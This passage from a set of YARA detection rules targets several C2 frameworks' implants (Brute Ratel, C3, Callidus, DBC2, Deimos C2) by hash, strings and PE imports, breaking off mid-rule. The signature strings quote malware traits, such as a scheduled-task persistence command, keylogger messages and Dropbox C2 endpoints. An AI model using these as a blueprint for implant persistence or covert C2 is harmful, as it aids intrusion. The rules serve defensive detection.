      description = "BruteRatel - badger_x64_stealth_RtlExitUserThread.bin"
      sha256_1 = "c7d36f2d9b3d532e892013a3a74b1dfde6430da4c799bb0b0812e01ad557a13c"
      sha256_2 = "ab2ee8a4068329fe2731d82c7ffa31ea1262f67ea08afa58bcd3280b3fbf6324"
   strings:
      $s1  = "AYAXZYPAQH" fullword ascii
      $s2  = "AWAVAUATM" fullword ascii
      $s3  = "AWAVAUM" fullword ascii
      $s4  = "bhfSv!6" fullword ascii
      $s5  = "VrdJrcU" fullword ascii
      $s6  = "tXRC4DCWt" fullword ascii
      $s7  = "6rhfN^4qyW" fullword ascii
      $s8  = "kejA\"'" fullword ascii
      $s9  = "LgVSX[4>" fullword ascii
      $s10 = "CXaAb4D6" fullword ascii
      $s11 = "XjXxiQ?" fullword ascii
      $s12 = "MOpm~vr" fullword ascii
      $s13 = "mmq&e$ddAXQRAPAQL" fullword ascii
      $s14 = "Jiysu^[r" fullword ascii
      $s15 = "_(t.oGR" fullword ascii
      $s16 = "tKTU7!2" fullword ascii
      $s17 = "xUdcmD" fullword ascii
      $s18 = "|owVVk)DK" fullword ascii
      $s19 = "EtPevsx" fullword ascii
      $s20 = "samgQ\"" fullword ascii
      $s21 = ".sWP&|" fullword ascii
      $s22 = "\"(hvLZ\\wE" fullword ascii
      $s23 = ",.MMgQ)y<" fullword ascii
      $s24 = "+ l%(U^u" fullword ascii
      $s25 = "SxjTLZ2" fullword ascii
      $s26 = "OJQx>$-=" fullword ascii
      $s27 = "|JXPC}5Q" fullword ascii
   condition:
      hash.sha256(0, filesize) == "c7d36f2d9b3d532e892013a3a74b1dfde6430da4c799bb0b0812e01ad557a13c" or
      hash.sha256(0, filesize) == "ab2ee8a4068329fe2731d82c7ffa31ea1262f67ea08afa58bcd3280b3fbf6324" or
      math.entropy(0, filesize) >= 7 and
      uint16(0) == 0x8348 and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerStealthService_x64 {
   meta:
      description = "BruteRatel - badger_x64_stealth_service.exe"
      sha256 = "78f9d1e1a0a990515546391c9aea26ee425a0794051d732fff92ded2fa7ba5ce"
   strings:
      $s1  = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" ascii
      $s2  = "  VirtualQuery failed for %d bytes at address %p" fullword ascii
      $s3  = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." fullword ascii
      $s4  = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" ascii
      $s5  = "pggmopa" fullword ascii
      $s6  = "  VirtualProtect failed with code 0x%x" fullword ascii
      $s7  = "tion or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user." fullword ascii
      $s8  = "TransactionBrokerService" fullword ascii
      $s9  = "AYAXZYPAQH" fullword ascii
      $s10 = "AWAVAUATM" fullword ascii
      $s11 = "AWAVAUM" fullword ascii
      $s12 = "  Unknown pseudo relocation protocol version %d." fullword ascii
      $s13 = "p62%q%" fullword ascii
      $s14 = "yqfgcr0" fullword ascii
      $s15 = ":MZuWHcB<H" fullword ascii
      $s16 = "V_XgIY!*" fullword ascii
      $s17 = "chPcT0X" fullword ascii
      $s18 = "kVea&{(" fullword ascii
      $s19 = "R?vnooO]L" fullword ascii
      $s20 = "rQPx[,D" fullword ascii
   condition:
      hash.sha256(0, filesize) == "78f9d1e1a0a990515546391c9aea26ee425a0794051d732fff92ded2fa7ba5ce" or
      math.entropy(0, filesize) >= 7 and
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.imports("advapi32.dll", "ChangeServiceConfig2A") and
      pe.imports("advapi32.dll", "ChangeServiceConfigA") and
      pe.imports("advapi32.dll", "StartServiceCtrlDispatcherA") and
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      uint16(0) == 0x5a4d and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerStealthBin_x64_WaitForSingleObject {
   meta:
      description = "BruteRatel - badger_x64_stealth_WaitForSingleObject.bin"
      sha256_1 = "efa977d502ce60fd5d596b64ff5bd07bb7fa71eb956bc8ca1e33dd23b68a4d8c"
      sha256_2 = "f5d0216c16287f0a84689ccfc732c6b4efcb686e2476b2dbd6aa5bb7802fd7df"
   strings:
      $s1  = "-},p:\\" fullword ascii
      $s2  = "AYAXZYPAQH" fullword ascii
      $s3  = "AWAVAUATM" fullword ascii
      $s4  = "AWAVAUM" fullword ascii
      $s5  = "\\o /No" fullword ascii
      $s6  = "mRCBh0e" fullword ascii
      $s7  = "iIHGF\\(" fullword ascii
      $s8  = "@$$)#|v}AXQRAPAQL" fullword ascii
      $s9  = "QaLb5+y" fullword ascii
      $s10 = "DsWN8F\\L" fullword ascii
      $s11 = "EscU,yQPaeB" fullword ascii
      $s12 = "|XRTiqS{" fullword ascii
      $s13 = "MXxG)]q" fullword ascii
      $s14 = "zesf!ub" fullword ascii
      $s15 = "_riizb_6" fullword ascii
      $s16 = "BABqh\\" fullword ascii
      $s17 = "xFMD@CH" fullword ascii
      $s18 = "eAtA_b-" fullword ascii
      $s19 = "R$.Naq" fullword ascii
      $s20 = "gQId?99<" fullword ascii
      $s21 = "N!^ /O" fullword ascii
      $s22 = "AqckaG(c" fullword ascii
      $s23 = "=ESzR=LH" fullword ascii
      $s24 = "50szmET|E" fullword ascii
      $s25 = "}- 0I$e" fullword ascii
   condition:
      hash.sha256(0, filesize) == "efa977d502ce60fd5d596b64ff5bd07bb7fa71eb956bc8ca1e33dd23b68a4d8c" or
      hash.sha256(0, filesize) == "f5d0216c16287f0a84689ccfc732c6b4efcb686e2476b2dbd6aa5bb7802fd7df" or
      math.entropy(0, filesize) >= 7 and
      uint16(0) == 0x8348 and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerBin_x64_WaitForSingleObject {
   meta:
      description = "BruteRatel - badger_x64_WaitForSingleObject.bin"
      sha256_1 = "8be0f684decfa6e675d9c9b38590222139b088fa236651b73d1a01f5994a7666"
      sha256_2 = "f7486405bd4ebfc2acf96c54202f536079bcbfc68b339550333bbed0ad03825c"
   strings:
      $s1  = "AYAXZYPAQH" fullword ascii
      $s2  = "AWAVAUATM" fullword ascii
      $s3  = "&.fm#a:dAXQRAPAQL" fullword ascii
      $s4  = "~AZV_gPPs&fZv" fullword ascii
      $s5  = "OrDnmSl" fullword ascii
      $s6  = "Onnn\"-" fullword ascii
      $s7  = "xDAX!X" fullword ascii
      $s8  = "RWaBcGu" fullword ascii
      $s9  = "1zpfd?" fullword ascii
      $s10 = "vUdc7TN" fullword ascii
      $s11 = "vQkR~oN' " fullword ascii
      $s12 = "x/sGxaW'O" fullword ascii
      $s13 = "tNwRf-'" fullword ascii
      $s14 = "fQBS\"W" fullword ascii
      $s15 = "LTEU0AA" fullword ascii
      $s16 = "s-.RBA@K" fullword ascii
      $s17 = "Gwsl\\U:p" fullword ascii
      $s18 = "75.yHG" fullword ascii
      $s19 = "SAHW&Nm" fullword ascii
      $s20 = "+uCLL't~Y_$(iW" fullword ascii
      $s21 = ";=%i3ta" fullword ascii
      $s22 = "X>,%S3x" fullword ascii
      $s23 = "hVIz)0a" fullword ascii
      $s24 = "uWrB~MB*vi=" fullword ascii
      $s25 = "aAkXv&Z" fullword ascii
      $s27 = "EnZl5%*" fullword ascii
      $s28 = "wsbnuob%" fullword ascii
   condition:
      hash.sha256(0, filesize) == "8be0f684decfa6e675d9c9b38590222139b088fa236651b73d1a01f5994a7666" or
      hash.sha256(0, filesize) == "f7486405bd4ebfc2acf96c54202f536079bcbfc68b339550333bbed0ad03825c" or
      math.entropy(0, filesize) >= 7 and
      uint16(0) == 0x8348 and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerDll_x86 {
   meta:
      description = "BruteRatel - badger_x86.dll"
      sha256_1 = "434a0fa442b1322e654142fe6a8bc35df3bcdebacb030ba68c4644f96df5caac"
      sha256_2 = "a38370ca0d2421369f30c1bd83cc5a7d393ba86ee16ae277aab2008374e7b278"
   strings:
      $s1  = "F5M5INBS.dll" fullword ascii
      $s2  = "  VirtualQuery failed for %d bytes at address %p" fullword ascii
      $s3  = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." fullword ascii
      $s4  = "4!535?5f5{5" fullword ascii
      $s5  = "  VirtualProtect failed with code 0x%x" fullword ascii
      $s6  = "cH:\"+SY" fullword ascii
      $s7  = "  Unknown pseudo relocation protocol version %d." fullword ascii
      $s8  = "TaNnOhb" fullword ascii
      $s9  = ")warvr6f" fullword ascii
      $s10 = "3;WiFF!S" fullword ascii
      $s11 = "VMbw`iC)" fullword ascii
      $s12 = "HvbS29@~\\A" fullword ascii
      $s13 = "WkCox*V%" fullword ascii
      $s14 = "WbkiPR%" fullword ascii
      $s15 = "ywTl=lQu" fullword ascii
      $s16 = "RCyDgt/" fullword ascii
      $s17 = "_SGimRpH" fullword ascii
      $s18 = "Gypy?#W" fullword ascii
      $s19 = "rKNW\\$D" fullword ascii
      $s20 = "QGTZx.\"" fullword ascii
      $s21 = "/ird_%k%vy?" fullword ascii
      $s22 = "zbMDO01" fullword ascii
      $s23 = "]Xbych4o" fullword ascii
      $s24 = "TNUu!E <" fullword ascii
      $s25 = "vSpZ3A3" fullword ascii
      $s26 = "stXi}G<" fullword ascii
      $s27 = "gkms\\#" fullword ascii
      $s28 = "V\\bhaV!" fullword ascii
      $s29 = "ZrJqHBf`" fullword ascii
   condition:
      hash.sha256(0, filesize) == "434a0fa442b1322e654142fe6a8bc35df3bcdebacb030ba68c4644f96df5caac" or
      hash.sha256(0, filesize) == "a38370ca0d2421369f30c1bd83cc5a7d393ba86ee16ae277aab2008374e7b278" or
      math.entropy(0, filesize) >= 7 and
      pe.imports("kernel32.dll", "GetNativeSystemInfo") and
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.characteristics & pe.DLL and
      uint16(0) == 0x5a4d and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerBin_x86_RtlExitUserThread {
   meta:
      description = "BruteRatel - badger_x86_RtlExitUserThread.bin"
      sha256_1 = "b25288c94464546446ee1f9d3b361f979895392219b4316645945dbb6ed045b9"
      sha256_2 = "144e66ef1ae2d6ec012ee88164141ed386b3240e0876ff63500203b665236511"
   strings:
      $s1  = "QT^%U%" fullword ascii
      $s2  = "nrWLO0J" fullword ascii
      $s3  = "RnPvIe_s" fullword ascii
      $s4  = "aHOcIO0A" fullword ascii
      $s5  = "hIHj\\4" fullword ascii
      $s6  = "TPfI/BA" fullword ascii
      $s7  = "XzJz\"D" fullword ascii
      $s8  = "wUjnc\\" fullword ascii
      $s9  = "yIaAkD{u" fullword ascii
      $s10 = "UtBn_(U&" fullword ascii
      $s11 = "uMeUH}Wc;" fullword ascii
      $s12 = "xRTPi\\" fullword ascii
      $s13 = "1OUhr!!" fullword ascii
      $s14 = "uNrKkND;" fullword ascii
      $s15 = "Lxua?iD" fullword ascii
      $s16 = "rWWKd2Vi" fullword ascii
      $s17 = "5pvQWR4*" fullword ascii
      $s18 = "NgyeM?" fullword ascii
      $s19 = "]xlxA?" fullword ascii
      $s20 = "UEfP<yP" fullword ascii
      $s21 = "- c7;;" fullword ascii
      $s22 = "2%Bm%0" fullword ascii
      $s23 = "P63%]%i~" fullword ascii
      $s24 = "zYvxRjs" fullword ascii
      $s25 = "zhCse%y" fullword ascii
      $s26 = "Ijlb^Ps" fullword ascii
      $s27 = "inYh~q0C" fullword ascii
      $s28 = "raigP]`" fullword ascii
      $s29 = "oIKjIr;_|" fullword ascii
   condition:
      hash.sha256(0, filesize) == "b25288c94464546446ee1f9d3b361f979895392219b4316645945dbb6ed045b9" or
      hash.sha256(0, filesize) == "144e66ef1ae2d6ec012ee88164141ed386b3240e0876ff63500203b665236511" or
      math.entropy(0, filesize) >= 7 and
      uint16(0) == 0xe483 and filesize < 600KB and
      8 of them
}

rule BruteRatel_BadgerService_x86 {
   meta:
      description = "BruteRatel - badger_x86_service.exe"
      sha256_1 = "ac99a80277cd93f35df6a962fb13fe807a28328433e5d1d8765a13e9bc9562cc"
      sha256_2 = "385c2e83b1f84acd9418c6cfaed52adc943d5b768ebe8dc731a73adf7edaa3a4"
   strings:
      $s1  = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" ascii
      $s2  = "  VirtualQuery failed for %d bytes at address %p" fullword ascii
      $s3  = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." fullword ascii
      $s4  = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" ascii
      $s5  = "  VirtualProtect failed with code 0x%x" fullword ascii
      $s6  = "tion or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user." fullword ascii
      $s7  = "TransactionBrokerService" fullword ascii
      $s8  = "  Unknown pseudo relocation protocol version %d." fullword ascii
      $s9  = "'tSAc?" fullword ascii
      $s10 = "adME<2B" fullword ascii
      $s11 = "EtWnPlR@*" fullword ascii
      $s12 = "xA]%d$" fullword ascii
      $s13 = "bTIlD:L" fullword ascii
      $s14 = "eldi.#]" fullword ascii
      $s15 = "wglk!@" fullword ascii
      $s16 = "WLiF*q:" fullword ascii
      $s17 = "YypyU`C" fullword ascii
      $s18 = ")lXxY| 2" fullword ascii
      $s19 = "ODVYo{# #" fullword ascii
      $s20 = "qWTLG$i" fullword ascii
      $s21 = "}%EP%VJ|D" fullword ascii
      $s22 = "wOCo*.|j\\" fullword ascii
   condition:
      hash.sha256(0, filesize) == "ac99a80277cd93f35df6a962fb13fe807a28328433e5d1d8765a13e9bc9562cc" or
      hash.sha256(0, filesize) == "385c2e83b1f84acd9418c6cfaed52adc943d5b768ebe8dc731a73adf7edaa3a4" or
      math.entropy(0, filesize) >= 7 and
      pe.imports("kernel32.dll", "GetNativeSystemInfo") and
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.imports("advapi32.dll", "ChangeServiceConfig2A") and
      pe.imports("advapi32.dll", "ChangeServiceConfigA") and
      pe.imports("advapi32.dll", "StartServiceCtrlDispatcherA") and
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      uint16(0) == 0x5a4d and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerBin_x86_WaitForSingleObject {
   meta:
      description = "BruteRatel - badger_x86_WaitForSingleObject.bin"
      sha256_1 = "34f4c3c83c8f700980f464f4f0b17e651c32dd2468fa93d6be65feccdefcb9d7"
      sha256_2 = "32aa5df260b711119b95cd5e3b31464174c4e75388f8ef65976f77a3c2bfcfa1"
   strings:
      $s1  = "u.Scg$]" fullword ascii
      $s2  = "VeUye?^(" fullword ascii
      $s3  = "vlHSYN;" fullword ascii
      $s4  = "VcOmK{" fullword ascii
      $s5  = "vKUEFs&" fullword ascii
      $s6  = "{wBwW6)h" fullword ascii
      $s7  = "RfCI\"C" fullword ascii
      $s8  = "XJ\"iFHoMUme6" fullword ascii
      $s9  = "vFarpxD" fullword ascii
      $s10 = "MvNt,OG@" fullword ascii
      $s11 = "DVQhcvq6 (" fullword ascii
      $s12 = "PsBWhs+" fullword ascii
      $s13 = "wU.FbR" fullword ascii
      $s14 = "rhTBPuq." fullword ascii
      $s15 = "mZatBjy" fullword ascii
      $s16 = ";Nzfpr:AP" fullword ascii
      $s17 = "%.Enb{$" fullword ascii
      $s18 = "lXLrko/dVtQ7" fullword ascii
      $s19 = ":(7.TNH" fullword ascii
      $s20 = "KXny@10" fullword ascii
      $s21 = "{Oc.qfy^" fullword ascii
      $s22 = "bqFBo$\\l)" fullword ascii
      $s23 = "SrtTo\"W=" fullword ascii
      $s24 = "ECNRNIMpWE" fullword ascii
      $s25 = "a{ZNYW75:;z" fullword ascii
      $s26 = "jwsW\\_6U" fullword ascii
      $s27 = "HdXdw]m!" fullword ascii
      $s28 = "@WBvXXJ?" fullword ascii
   condition:
      hash.sha256(0, filesize) == "34f4c3c83c8f700980f464f4f0b17e651c32dd2468fa93d6be65feccdefcb9d7" or
      hash.sha256(0, filesize) == "32aa5df260b711119b95cd5e3b31464174c4e75388f8ef65976f77a3c2bfcfa1" or
      math.entropy(0, filesize) >= 7 and
      uint16(0) == 0xe483 and filesize < 600KB and
      8 of them
}

rule BruteRatel_SyscallStageBin_x64_RtlExitUserThread {
   meta:
      description = "BruteRatel - syscall_stage_x64_RtlExitUserThread.bin"
      sha256 = "596a12d0c792569148bf5404d3074ba4fe0fff0f14f48f3244463d0d7a83f5ca"
   strings:
      $s1  = ":{\"auth\"L" fullword ascii
      $s2  = "AWAVAUATM" fullword ascii
      $s3  = "AWAVAUM" fullword ascii
      $s4  = "AWAVAUATI" fullword ascii
      $s5  = "{\"arch\":UH" fullword ascii
      $s6  = "AUATE1" fullword ascii
      $s7  = "PMch<H" fullword ascii
      $s8  = "McT$<L" fullword ascii
      $s9  = "64,\"cds\"H" fullword ascii
      $s10 = "n.\\d}#l$YH" fullword ascii
      $s11 = { 554889e541574156415541544d89c457 }
      $s12 = { 554889e54157415641554d89c5415457 }
      $s13 = { 554889e55756534889cb4883e4f04881 }
      $s14 = { 554889e541574156415541544989d4ba }
      $s15 = { 554889e5415541545756534883e4f048 }
   condition:
      hash.sha256(0, filesize) == "596a12d0c792569148bf5404d3074ba4fe0fff0f14f48f3244463d0d7a83f5ca" or
      uint16(0) == 0x8348 and filesize < 30KB and
      all of them
}

rule BruteRatel_SyscallStageBin_x64_WaitForSingleObject {
   meta:
      description = "BruteRatel - syscall_stage_x64_WaitForSingleObject.bin"
      sha256 = "2c24d72cf36f0abf83faa2d0fdd6728ed945ba9d0e9f787e98d8f25d07f1f384"
   strings:
      $s1  = ":{\"auth\"L" fullword ascii
      $s2  = "AWAVAUATM" fullword ascii
      $s3  = "AWAVAUM" fullword ascii
      $s4  = "AWAVAUATI" fullword ascii
      $s5  = "{\"arch\":UH" fullword ascii
      $s6  = "AUATE1" fullword ascii
      $s7  = "PMch<H" fullword ascii
      $s8  = "McT$<L" fullword ascii
      $s9  = "64,\"cds\"H" fullword ascii
      $s10 = "n.\\d}#l$YH" fullword ascii
      $s11 = { 554889e541574156415541544d89c457 }
      $s12 = { 554889e54157415641554d89c5415457 }
      $s13 = { 554889e55756534889cb4883e4f04881 }
      $s14 = { 554889e541574156415541544989d4ba }
      $s15 = { 554889e5415541545756534883e4f048 }
   condition:
      hash.sha256(0, filesize) == "2c24d72cf36f0abf83faa2d0fdd6728ed945ba9d0e9f787e98d8f25d07f1f384" or
      uint16(0) == 0x8348 and filesize < 30KB and
      all of them
}

rule BruteRatel_SyscallStageBin_x86_RtlExitUserThread {
   meta:
      description = "BruteRatel - syscall_stage_x86_RtlExitUserThread.bin"
      sha256 = "2b1f466ab2c78bb3f8fd287a7cb3c87922317fe7cd348aa699e57b285544c2a9"
   strings:
      $s1  = "D$`POST" fullword ascii
      $s2  = "@h$p<pu" fullword ascii
      $s3  = "D$ich\":" fullword ascii
      $s4  = "D$yuth\"" fullword ascii
      $s5  = "D$m86,\"" fullword ascii
      $s6  = "D$e{\"ar" fullword ascii
      $s7  = "D$\\\"}}" fullword ascii
      $s8  = "D$u:{\"a" fullword ascii
      $s9  = "D$qcds\"" fullword ascii
      $s10 = "n.\\d}#l$YRQ" fullword ascii
      $s11 = { 558b7c2458033b893c24e8970400003b }
   condition:
      hash.sha256(0, filesize) == "2b1f466ab2c78bb3f8fd287a7cb3c87922317fe7cd348aa699e57b285544c2a9" or
      uint16(0) == 0xe483 and filesize < 20KB and
      all of them
}

rule BruteRatel_SyscallStageBin_x86_WaitForSingleObject {
   meta:
      description = "BruteRatel - syscall_stage_x86_WaitForSingleObject.bin"
      sha256 = "14912bc7b7f9555231f3145f5ed81dd9776ff40d7a750e0908288406762acf31"
   strings:
      $s1  = "D$`POST" fullword ascii
      $s2  = "@h$p<pu" fullword ascii
      $s3  = "D$ich\":" fullword ascii
      $s4  = "D$yuth\"" fullword ascii
      $s5  = "D$m86,\"" fullword ascii
      $s6  = "D$e{\"ar" fullword ascii
      $s7  = "D$\\\"}}" fullword ascii
      $s8  = "D$u:{\"a" fullword ascii
      $s9  = "D$qcds\"" fullword ascii
      $s10 = "n.\\d}#l$YRQ" fullword ascii
      $s11 = { 558b7c2458033b893c24e8970400003b }
   condition:
      hash.sha256(0, filesize) == "14912bc7b7f9555231f3145f5ed81dd9776ff40d7a750e0908288406762acf31" or
      uint16(0) == 0xe483 and filesize < 20KB and
      all of them
}


- C3 (Custom Command and Control)

import "hash"
import "pe"

rule C3 {
   meta:
      description = "C3 - NodeRelayDll_r64.dll, NodeRelayDll_r86.dll"
      sha256_1 = "ca83ab01d46925f1d3a559affd3398d1cfe5d0abd637413cd5ae25f1fe7bd008"
      sha256_2 = "85bc111b4d83b7fafd4c72832f23ebeadd1a9a74942aab072c928b1fc8b55625"
   strings:
      $s1 = "api-ms-win-core-synch-l1-2-0.dll" fullword wide
      $s2 = "AppPolicyGetProcessTerminationMethod" fullword ascii
      $s3 = "        <requestedExecutionLevel level='asInvoker' uiAccess='false' />" fullword ascii
      $s4 = "[x] error creating Token" fullword ascii
      $s5 = "[x] error setting token" fullword ascii
      $s6 = "AppPolicyGetThreadInitializationType" fullword ascii
      $s7 = "invalid vector subscript" fullword ascii
      $s8 = " Type Descriptor'" fullword ascii
      $s9 = ".?AVfilesystem_error@filesystem@std@@" fullword ascii
      $s10 = "[x] error duplicating token" fullword ascii
      $s11 = "directory_iterator::operator++" fullword ascii
      $s12 = "syntax error " fullword ascii
      $s13 = "operator co_await" fullword ascii
      $s14 = "object key" fullword ascii
      $s15 = "operator<=>" fullword ascii
      $s16 = ".data$rs" fullword ascii
      $s17 = "sysrandom" fullword ascii
      $s18 = "parse error: character [" fullword ascii
      $s19 = "X-Atlassian-Token" fullword ascii
      $s20 = ".?AVparse_error@detail@nlohmann@@" fullword ascii
   condition:
      hash.sha256(0, filesize) == "ca83ab01d46925f1d3a559affd3398d1cfe5d0abd637413cd5ae25f1fe7bd008" or
      hash.sha256(0, filesize) == "85bc111b4d83b7fafd4c72832f23ebeadd1a9a74942aab072c928b1fc8b55625" or
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.imports("kernel32.dll", "FindNextFileW") and
      pe.imports("advapi32.dll", "DuplicateTokenEx") and
      pe.imports("advapi32.dll", "SystemFunction036") and
      pe.imports("winhttp.dll", "WinHttpConnect") and
      pe.imports("winhttp.dll", "WinHttpCrackUrl") and
      pe.characteristics & pe.DLL and
      ((uint16(0) == 0x5a4d and filesize < 4000KB and (8 of them)) or (all of them))
}


- Callidus

import "hash"
import "pe"

rule Callidus_EXEs {
   meta:
      description = "Callidus - OneNoteC2Client.exe, OutlookC2Client.exe"
      sha256_1 = "96d0bec95be57bb098632ab49eb8a2f23d3a7c9dc1e288a5fb990fa5ccec1bca"
      sha256_2 = "0860153f607f4536b72d0ee821628077aa4e17f2465a00424b798c9e720505ef"
   strings:
      $s1  = "hostfxr.dll" fullword wide
      $s2  = "--- Invoked %s [version: %s, commit hash: %s] main = {" fullword wide
      $s3  = "This executable is not bound to a managed DLL to execute. The binding value is: '%s'" fullword wide
      $s4  = "F:\\workspace\\_work\\1\\s\\artifacts\\obj\\win-x64.Release\\corehost\\cli\\apphost\\Release\\apphost.pdb" fullword ascii
      $s5  = "The managed DLL bound to this executable is: '%s'" fullword wide
      $s6  = "A fatal error was encountered. This executable was not bound to load a managed DLL." fullword wide
      $s7  = "Extraction completed by another process, aborting current extraction." fullword wide
      $s8  = "Failed to resolve full path of the current executable [%s]" fullword wide
      $s9  = "Failed to remove temporary file [%s]." fullword wide
      $s10 = "Failed to remove temporary directory [%s]." fullword wide
      $s11 = "The managed DLL bound to this executable could not be retrieved from the executable image." fullword wide
      $s12 = "  - Installing .NET Core prerequisites might help resolve this problem." fullword wide
      $s13 = "https://go.microsoft.com/fwlink/?linkid=798306" fullword wide
      $s14 = "Bundle header version compatibility check failed" fullword wide
      $s15 = "I/O failure reading contents of the bundle." fullword wide
      $s16 = "Couldn't open host binary for reading contents" fullword wide
      $s17 = "Failed to load the dll from [%s], HRESULT: 0x%X" fullword wide
      $s18 = "The required library %s does not support relative app dll paths." fullword wide
      $s19 = "Failure processing application bundle; possible file corruption." fullword wide
      $s20 = "Failure processing application bundle." fullword wide
   condition:
      hash.sha256(0, filesize) == "96d0bec95be57bb098632ab49eb8a2f23d3a7c9dc1e288a5fb990fa5ccec1bca" or
      hash.sha256(0, filesize) == "0860153f607f4536b72d0ee821628077aa4e17f2465a00424b798c9e720505ef" or
      pe.imports("kernel32.dll", "FindNextFileW") and
      pe.imports("kernel32.dll", "RemoveDirectoryW") and
      pe.imports("kernel32.dll", "TerminateProcess") and
      pe.imports("advapi32.dll", "RegisterEventSourceW") and
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      ((uint16(0) == 0x5a4d and filesize < 500KB and (8 of them)) or (all of them))
}

rule Callidus_DLLs {
   meta:
      description = "Callidus - OneNoteC2Client.dll, OutlookC2Client.dll"
      sha256_1 = "066857279d1e93a2ffdb1df8e1d509f6cc58a60083674e842a1e178cf1483904"
      sha256_2 = "4f9e6582ebf1b3d5077d8a94b3696bc71f43984c7672c9eb696868f9dd711bca"
   strings:
      $s1  = "ShellExecuteWithPath" fullword ascii
      $s2  = "<ShellExecuteWithPath>b__1" fullword ascii
      $s3  = "<ShellExecuteWithPath>b__0" fullword ascii
      $s4  = "System.Diagnostics.Process" fullword ascii
      $s5  = "ShellCommand" fullword ascii
      $s6  = "https://graph.microsoft.com/.default" fullword wide
      $s7  = "CallGetWebApiAndProcessResultASync" fullword ascii
      $s8  = "<CallGetWebApiAndProcessResultASync>d__5" fullword ascii
      $s9  = "getuserid" fullword ascii
      $s10 = "<CallGetWebApiAndProcessResultASync>b__5_0" fullword ascii
      $s11 = "CallPostWebApiAndProcessResultASync" fullword ascii
      $s12 = "get_contentType" fullword ascii
      $s13 = "get_content" fullword ascii
      $s14 = "getmessages" fullword ascii
      $s15 = "System.Configuration.ConfigurationManager" fullword ascii
      $s16 = "GetAccountsAsync" fullword ascii
      $s17 = "get_HttpClient" fullword ascii
      $s18 = "CallDeleteWebApiAndProcessResultASync" fullword ascii
      $s19 = "<content>k__BackingField" fullword ascii
      $s20 = "set_UseShellExecute" fullword ascii
   condition:
      hash.sha256(0, filesize) == "066857279d1e93a2ffdb1df8e1d509f6cc58a60083674e842a1e178cf1483904" or
      hash.sha256(0, filesize) == "4f9e6582ebf1b3d5077d8a94b3696bc71f43984c7672c9eb696868f9dd711bca" or
      ((uint16(0) == 0x5a4d and filesize < 80KB and (8 of them)) or (all of them))
}


- DBC2

import "hash"
import "pe"

rule DBC2_Loader {
   meta:
      description = "DBC2 - dbc2Loader.dll"
      sha256 = "045312cb098438fe9dbcecf713766bff29d171726fb228de92ef54447564bbb4"
   strings:
      $x1  = "dbc2Loader.dll" fullword wide
      $s2  = "dropboxc2.C2_Agent" fullword wide
      $s3  = "dbc2Loader" fullword ascii
      $s4  = "[ERROR] Missing arguments" fullword wide
      $s5  = "loadDBC2" fullword ascii
      $s6  = "masterKey" fullword ascii
      $s7  = "WebRequest" fullword ascii
      $s8  = "Console" fullword ascii
      $s9  = "source" fullword ascii
      $s10 = "xorKey" fullword ascii
      $s11 = "System.Runtime.CompilerServices" fullword ascii
      $s12 = "System.Reflection" fullword ascii
      $s13 = "System" fullword ascii
   condition:
      hash.sha256(0, filesize) == "045312cb098438fe9dbcecf713766bff29d171726fb228de92ef54447564bbb4" or
      pe.characteristics & pe.DLL and
      uint16(0) == 0x5a4d and filesize < 10KB and
      1 of ($x*) and 4 of them
}

rule DBC2_Agent {
   meta:
      description = "DBC2 - dbc2_agent.exe"
      sha256 = "ba606da59063a837e704a49b065979ad4ea4b508c8600e520a8c69948332661b"
   strings:
      $x1  = "ERROR - COULD NOT EXECUTE COMMAND:" fullword wide
      $s2  = "ERROR - Could not send key strokes to the process, probably wrong keystrokes sequence" fullword wide
      $s3  = "ERROR - Could not find a process with name " fullword wide
      $s4  = "https://content.dropboxapi.com/2/files/download" fullword wide
      $s5  = "ERROR - COULD NOT EXECUTE: " fullword wide
      $s6  = "OK - KeyLogger started" fullword wide
      $s7  = "%USERPROFILE%\\AppData\\Local\\WindowsUserLogRotate" fullword wide
      $s8  = "dbc2_agent.exe" fullword wide
      $s9  = "https://content.dropboxapi.com/2/files/upload" fullword wide
      $s10 = "https://api.dropboxapi.com/2/files/get_metadata" fullword wide
      $s11 = "OK - PROCESS STARTED: " fullword wide
      $s12 = "OK - Key strokes sent to process " fullword wide
      $s13 = "OK - Clipboard logger started" fullword wide
      $s14 = "schtasks /create /TN 'WindowsUserLogRotate' /TR '" fullword wide
      $s15 = "https://api.dropboxapi.com/2/files/list_folder" fullword wide
      $s16 = "https://api.dropboxapi.com/2/files/move" fullword wide
      $s17 = "https://api.dropboxapi.com/2/files/delete" fullword wide
      $s18 = "clipboardlogger" fullword wide
      $s19 = "OK - FILE DOWNLOADED AT: " fullword wide
      $s20 = "shellProcess" fullword ascii
   condition:
      hash.sha256(0, filesize) == "ba606da59063a837e704a49b065979ad4ea4b508c8600e520a8c69948332661b" or
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      uint16(0) == 0x5a4d and filesize < 70KB and
      1 of ($x*) and 4 of them
}


- Deimos C2

import "hash"
import "pe"

rule DeimosC2_Win {
   meta:
      description = "DeimosC2 - lsadump.exe, minidump.exe, ntdsdump.exe, samdump.exe, screengrab.exe"
      sha256_1 = "d5a3de19ef84c040a5b0058fb4fb2a036c9a8db7495763bcc7b7070f16cde967"
      sha256_2 = "0c1d6b6f18811bda502df7302025950b189a75368185f9632ed96cc694ee4f8e"
      sha256_3 = "195a255225c246f360d80e4ac4287cbcd4ca8025a68631dfa3c28b365cd5a25c"
      sha256_4 = "cb72621b89c8a1d9686846183e86a09d7564d085927be2f483d739aeb60fcfdd"
